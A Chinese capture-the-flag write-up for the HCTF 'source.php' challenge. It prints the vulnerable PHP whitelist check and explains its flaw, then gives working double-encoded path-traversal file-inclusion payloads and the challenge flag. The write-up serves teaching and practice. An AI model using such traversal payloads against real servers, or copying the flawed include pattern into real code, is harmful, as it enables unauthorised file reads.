难度系数: ★★
题目来源: HCTF
题目描述: 暂无
题目场景: http://220.249.52.133:38343 (温馨提示:每次进入URL的端口号都不一样)
1、点击链接进入如下界面
2、查看源代码(按F12或F12+Fn),出现以下代码。
<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="ie=edge"><title>Document</title>
</head>
<!-- The landing page carries no functionality; the only thing of interest is the HTML comment
     inside <body>, which discloses the name of a server-side file (source.php). That leaked
     file name is the recon foothold the rest of this writeup builds on (step 3). -->
<body><!--source.php--><br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" /></body>
</html>
3、发现了“source.php”
则在链接后面加上“/source.php”
即 http://220.249.52.133:38343/source.php
4、输入URL之后,跳出以下信息
<?php
// Challenge source as served at /source.php (HCTF). Shown here byte-for-byte (only whitespace and
// comments added) because the defect it contains is what the payload later on this page exploits.
// highlight_file() prints this very file to any visitor, which is how the checks below become known.
highlight_file(__FILE__);
class emmm{
    // Decides whether $page may be passed to include. Returns true when $page itself, or $page
    // truncated at its first '?', or urldecode($page) truncated at its first '?', equals one of
    // the whitelisted file names. Prints "you can't see it" and returns false otherwise.
    //
    // $page is taken by reference but is never modified here: the derived string that is
    // actually validated ($_page) is never written back, so the caller still includes the
    // ORIGINAL request string. That validation/use mismatch is the root cause of the bypass.
    public static function checkFile(&$page){
        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
        if (! isset($page) || !is_string($page)) {
            echo "you can't see it";
            return false;
        }
        // Check 1: exact match against a whitelisted name.
        if (in_array($page, $whitelist)) {
            return true;
        }
        // Check 2: keep everything before the first '?'. Appending '?' to the haystack guarantees
        // mb_strpos finds one, so an input without '?' is kept whole rather than truncated to ''.
        $_page = mb_substr($page,0,mb_strpos($page . '?', '?'));
        if (in_array($_page, $whitelist)) {
            return true;
        }
        // Check 3: same as check 2, but after one extra urldecode(). The web server has already
        // URL-decoded the query once, so a double-encoded "%253f" reaches here as "%3f" and only
        // now turns into '?'. After this step "source.php?/../x" truncates to "source.php" and
        // passes, even though the raw value still contains "%3f/../x".
        $_page = urldecode($page);
        $_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));
        if (in_array($_page, $whitelist)) {
            return true;
        }
        echo "you can't see it";
        return false;
    }
}
if (! empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm::checkFile($_REQUEST['file'])) {
    // What gets included is the raw $_REQUEST['file'], not the $_page value that was validated.
    // With a passing prefix such as "source.php%3f/../../../../ffffllllaaaagggg" the include path
    // resolver walks back over the non-existent "source.php%3f" segment via the "../" components
    // and opens the traversed-to file — the successful payload on this page demonstrates this.
    // NOTE(review): the fix is to include by whitelist key ($whitelist[$key]) or to realpath() the
    // request and compare the resolved path against an allow-list of resolved paths, never the
    // raw string that was validated only after decoding/truncation.
    include $_REQUEST['file'];
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
5、发现了关键信息
$whitelist = [“source”=>“source.php”,“hint”=>“hint.php”];
6、在链接后加上/hint.php
URL: http://220.249.52.133:38343/hint.php
7、输入URL,出现以下信息（原文截图缺失；后面 payload 中使用的文件名 ffffllllaaaagggg 应即来自此处的提示）
8、然后构造payload
?file=source.php%253f/../../../../ffffllllaaaagggg
URL: http://220.249.52.133:38343/source.php?file=source.php%253f/../../../../ffffllllaaaagggg
原理说明：Web 服务器先对查询串解码一次，到达 PHP 时 $_REQUEST['file'] 的值为 source.php%3f/../../../../ffffllllaaaagggg。checkFile 的前两次判断（原串比对、按 ? 截断后比对）都不命中；第三次判断先 urldecode 得到 source.php?/../../../../ffffllllaaaagggg，再按 ? 截断得到 source.php，命中白名单返回 true。但随后 include 的是未经 urldecode 的原始 $_REQUEST['file']：PHP 解析包含路径时会规范化其中的 ../，不存在的 source.php%3f 目录段被回退掉，最终读到上层目录中的 ffffllllaaaagggg。被校验的字符串和实际被包含的字符串不是同一个，这就是本题文件包含/目录穿越的根因；../ 的个数只需足以回到目标所在目录（到达根目录后多余的 ../ 不再起作用）。
这样也可以：白名单里还有 hint.php，所以把前缀换成 hint.php%253f/../../../../ffffllllaaaagggg 同样能通过校验并读到 flag。
9、找到flag
10、OK
flag{25e7bce6005c4e0c983fb97297ac6e5a}